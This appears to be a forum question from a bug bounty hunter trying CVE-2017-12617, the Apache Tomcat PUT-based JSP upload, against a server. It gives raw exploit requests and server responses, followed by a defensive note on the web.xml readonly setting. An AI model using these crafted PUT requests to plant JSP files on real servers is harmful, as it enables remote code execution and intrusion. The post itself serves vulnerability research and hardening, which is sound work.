I am a bug bounty hunter. When doing some research, I found a subdomain that is using Apache Tomcat. Talking about Tomcat, there was a vulnerability found in 2017: CVE-2017-12617.
Any Apache Tomcat server with the PUT request method enabled will allow an attacker to create a JSP file on the server through a crafted request, which will lead to RCE:
```http
PUT /1.jsp/ HTTP/1.1
Host: vulnerable.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://vulnerable.com/public/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26

<% out.println("hello");%>
```
And after some testing, I found that the server has the PUT method enabled. But when I sent the exploit request, there was an error:
```http
PUT /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

<% out.println("hello");%>


HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 389
Date: Fri, 17 Apr 2020 02:07:24 GMT
Connection: close

<html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Fri Apr 17 11:07:24 JST 2020</div><div>There was an unexpected error (type=Internal Server Error, status=500).</div><div>URLDecoder: Illegal hex characters in escape (%) pattern - For input string: " o"</div></body></html>
```
I found that the error is from the Java URLDecoder. The server may have decoded the content in the body of the request, but `% o` is not a valid URL escape, so the error occurs. It proves that the server has handled the request; it might work, but it doesn't. Then I tried this:
```http
PUT /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

<%25 out.println("hello");%25>


HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Fri, 17 Apr 2020 02:05:30 GMT
Connection: close
Content-Length: 1295

<!DOCTYPE html>
<!--
  ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
  ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
  -->
<html>
<head>
<title>VULNEARBLE</title>
...
```
It gave me back a 404 response. I have tried POST, but it just proves that there is something special about the PUT method:
```http
POST /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

<% out.println("hello");%>


HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Fri, 17 Apr 2020 02:05:30 GMT
Connection: close
Content-Length: 1295

<!DOCTYPE html>
<!--
  ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
  ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
  -->
<html>
<head>
<title>VULNEARBLE</title>
...
```
(The POST request does not even produce any error or response.) I have checked the 1.jsp file, but it hasn't been created yet:
```http
GET /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26


HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Fri, 17 Apr 2020 02:05:30 GMT
Connection: close
Content-Length: 1295

<!DOCTYPE html>
<!--
  ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
  ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
  -->
<html>
<head>
<title>VULNEARBLE</title>
...
```
Does anyone know what is happening and what I should do next?
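As an added note on the defensive side (not part of the original question): CVE-2017-12617 is only reachable when Tomcat's DefaultServlet has its `readonly` init-param set to `false`; the value Tomcat ships is `true`. The fragment below, which assumes a standalone Tomcat deployment configured through `conf/web.xml`, shows the weak setting beside the corrected one.

```xml
<!-- conf/web.xml (standalone Tomcat), DefaultServlet definition.
     Weak configuration: readonly=false lets PUT and DELETE write into the
     webapp, which is the precondition for CVE-2017-12617 on unpatched builds. -->
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>  <!-- weak: uploads allowed -->
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

<!-- Corrected configuration: readonly=true (the Tomcat default; leaving the
     init-param out has the same effect) makes the DefaultServlet answer PUT
     and DELETE with 403 Forbidden, so a PUT to /1.jsp/ cannot create a file.
     Upgrading to a Tomcat release that fixes CVE-2017-12617 is still required. -->
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>true</param-value>   <!-- corrected: read-only -->
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>
```

A quick audit on a standalone install is to search `conf/web.xml` and every deployed `WEB-INF/web.xml` for a `readonly` param-value of `false`; an embedded container (for example a Spring Boot application, whose default error page is the "Whitelabel Error Page" seen above) configures the DefaultServlet in code instead, so the same setting has to be checked there.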